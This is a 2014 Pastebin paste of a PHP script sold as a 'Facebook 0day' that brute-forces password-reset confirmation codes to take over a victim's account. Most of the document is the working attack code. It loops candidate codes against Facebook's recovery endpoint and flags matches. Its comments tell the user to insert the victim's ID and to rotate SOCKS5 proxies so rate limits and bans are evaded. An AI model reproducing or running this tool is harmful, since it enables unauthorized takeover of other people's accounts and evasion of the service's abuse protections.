indongsaeng

[PHP] Facebook 0day Crack Reset Code

Jun 21st, 2014
258
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.69 KB | None | 0 0
  1. First of All Read Description inside the PHP Code so you can get the idea how to use it correctly \!/
  2.  
  3. Note: Change the word TARGET by The Victim Facebook ID N° and good chance \!/ ^_^
  4.  
  5. PHP CODE :
  6.  
  7. <?
  8. /*
  9. [+] Facebook Code Security Cracker
  10. [+] Coded By : Mauritania Attacker
  11. [+] GreetZ : All AnonGhost MemberZ
  12. [+] FuCk Priv888888888888888888888
  13.  
  14.  
  15. ~~HACKING IS ART OF EXPLOITATION~~
  16.  
  17. <3 <3 <3 I'm not educated , I hate school , Hacking is my life xD !!!!!!!!!!!!!!!!!!!!!!!!!! <3 <3 <3
  18.  
  19. // How to use: Restore your victim account and better choose the email option :p , and the rest is to use your mind \!/
  20. I suggest you to use an auto rotating proxy after each 2 minutes so you won't get banned :D , i've bypassed already the captcha
  21. security and cookies ,so facebook won't let you try many attempts so proxy is the solution !
  22.  
  23. you still can add a proxy socks v5 option in Curl only two lines :
  24.  
  25. curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
  26. curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  27.  
  28. You can edit my script and try to develop it more if you have some ideas you are free , but don't forget the Copyright wkwkwkwkwkwk xd <3
  29.  
  30. Sharing is Caring \!/
  31.  
  32. Sorry my english is bad and i'm lazy xD !
  33. */
  34.  
  35. @set_time_limit(0);
  36. echo "<form method='POST'>
  37. <title>Facebook Code Security Cracker > By Mauritania Attacker</title>
  38. <p align='center'>
  39. <img border='0' src='http://www.bubblews.com/assets/images/news/740959391_1392900678.png' width='444' height='298'></p>
  40. <style>
  41. /* Rounded Corners */
  42. #ghost {
  43. border: 1px #765942;
  44. border-radius: 10px;
  45. height: 250px;
  46. width: 200px; }
  47. input {
  48. /* INPUTS */
  49. border: 1px solid #765942;
  50. border-radius: 10px; }
  51. </style>
  52. <center><font color='#006600' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Mauritania Attacker</center>
  53. <center><textarea cols='10' rows='6' id='ghost' name='code'></textarea><br></center>
  54. <p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
  55. </form>";
  56. $user = explode("\r\n", $_POST['code']);
  57. if($_POST['scan'])
  58. {
  59. foreach($user as $code)
  60. {
  61. // Curl Function ^_^
  62. $ch = curl_init();
  63. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u=TARGET&n={$code}");
  64. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  65. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  66. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  67. curl_setopt($ch, CURLOPT_HEADER, 1);
  68. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version)
  69.  
  70. $check = curl_exec($ch);
  71. if(eregi("password_new", $check)) //Keyword Good Response ^_^
  72. {
  73. echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found ^_^ </font><br>";
  74. }
  75. else
  76. {
  77. echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
  78. }
  79. curl_close($ch);
  80. }
  81. }
  82. @system("del cookie.txt"); //Delete cookies command for win server.
  83. @system("rm cookie.txt"); // Delete cookies command for linux server.
  84. ?>
Add Comment
Please, Sign In to add comment